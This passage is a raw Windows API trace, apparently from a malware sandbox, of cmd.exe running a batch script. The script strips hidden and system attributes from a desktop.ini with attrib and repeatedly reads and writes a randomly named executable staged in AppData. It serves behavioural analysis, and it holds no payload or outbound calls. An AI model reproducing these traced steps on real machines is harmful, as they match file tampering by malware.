(_String1="KEYS", _String2="CD") returned 8 [0202.531] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.531] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 
[0202.531] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.531] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.531] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.531] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.531] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.532] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f9a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.532] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f9a0, lpFilePart=0x12f99c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f99c*="Desktop") returned 0x18 [0202.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f71c | out: lpFindFileData=0x12f71c) returned 0x2b0c90 [0202.532] FindClose (in: hFindFile=0x2b0c90 | out: hFindFile=0x2b0c90) returned 1 [0202.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.532] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.532] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.532] GetEnvironmentStringsW () returned 0x2b04b0* [0202.533] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 
[0202.533] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.533] GetConsoleOutputCP () returned 0x1b5 [0202.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.533] GetUserDefaultLCID () returned 0x409 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fae0, cchData=128 | out: lpLCData="0") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fae0, cchData=128 | out: lpLCData="0") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fae0, cchData=128 | out: lpLCData="1") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.534] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.534] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.535] GetConsoleTitleW (in: lpConsoleTitle=0x2a0ad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.535] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.535] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.536] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0202.536] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0202.536] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0202.536] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0202.536] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0202.536] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0202.536] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0202.538] _wcsicmp (_String1="del", _String2=")") returned 59 [0202.538] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0202.538] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0202.538] _wcsicmp (_String1="IF", _String2="del") returned 5 [0202.538] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0202.538] _wcsicmp (_String1="REM", _String2="del") returned 14 [0202.538] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0202.540] _wcsicmp (_String1="type", _String2=")") returned 75 [0202.540] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0202.540] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0202.540] _wcsicmp (_String1="IF", _String2="type") returned -11 [0202.540] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0202.540] _wcsicmp (_String1="REM", _String2="type") returned -2 
[0202.540] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0202.545] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.545] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.557] FindClose (in: hFindFile=0x2b2560 | out: hFindFile=0x2b2560) returned 1 [0202.557] FindClose (in: hFindFile=0x2b2560 | out: hFindFile=0x2b2560) returned 1 [0202.557] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0202.557] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0202.557] GetConsoleTitleW (in: lpConsoleTitle=0x12f508, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.558] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f390, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f458 | out: lpAttributeList=0x12f390, lpSize=0x12f458) returned 1 [0202.558] UpdateProcThreadAttribute (in: lpAttributeList=0x12f390, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f450, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f390, lpPreviousValue=0x0) returned 1 [0202.558] GetStartupInfoW (in: lpStartupInfo=0x12f34c | out: lpStartupInfo=0x12f34c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0202.558] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.559] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", 
lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f3ec*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f438 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessInformation=0x12f438*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe74, dwThreadId=0xeb8)) returned 1 [0202.561] CloseHandle (hObject=0x4c) returned 1 [0202.561] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.561] GetEnvironmentStringsW () returned 0x2b09e0* [0202.561] FreeEnvironmentStringsW (penv=0x2b09e0) returned 1 [0202.561] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0202.919] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f32c | out: lpExitCode=0x12f32c*=0x0) returned 1 [0202.919] CloseHandle (hObject=0x50) returned 1 [0202.919] _vsnwprintf (in: _Buffer=0x12f474, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f338 | out: _Buffer="00000000") returned 8 [0202.920] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0202.920] GetEnvironmentStringsW () returned 0x2b25b0* [0202.920] FreeEnvironmentStringsW (penv=0x2b25b0) returned 1 [0202.920] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.920] GetEnvironmentStringsW () returned 0x2b25b0* [0202.920] FreeEnvironmentStringsW (penv=0x2b25b0) returned 1 [0202.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f390 | out: 
lpAttributeList=0x12f390) [0202.920] GetConsoleTitleW (in: lpConsoleTitle=0x12f710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.920] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\desktop.ini")) returned 0xffffffff [0202.921] GetLastError () returned 0x2 [0202.921] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1")) returned 0x10 [0202.921] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0202.921] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0202.921] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\desktop.ini")) returned 0xffffffff [0202.921] GetLastError () returned 0x2 [0202.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12f1bc | out: lpConsoleScreenBufferInfo=0x12f1bc) returned 1 [0202.921] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0202.923] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0202.923] GetConsoleTitleW (in: lpConsoleTitle=0x12f6ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.923] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0202.923] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.924] GetFileType 
(hFile=0x50) returned 0x1 [0202.924] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.924] GetFileType (hFile=0x50) returned 0x1 [0202.925] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.925] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] GetFileType (hFile=0x50) returned 0x1 [0202.926] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.926] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.927] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.927] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] GetFileType (hFile=0x50) returned 0x1 [0202.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.927] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.928] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] GetFileType (hFile=0x50) returned 0x1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.928] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType 
(hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.929] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.929] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.929] GetFileType (hFile=0x50) returned 0x1 [0202.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, 
lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.930] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, 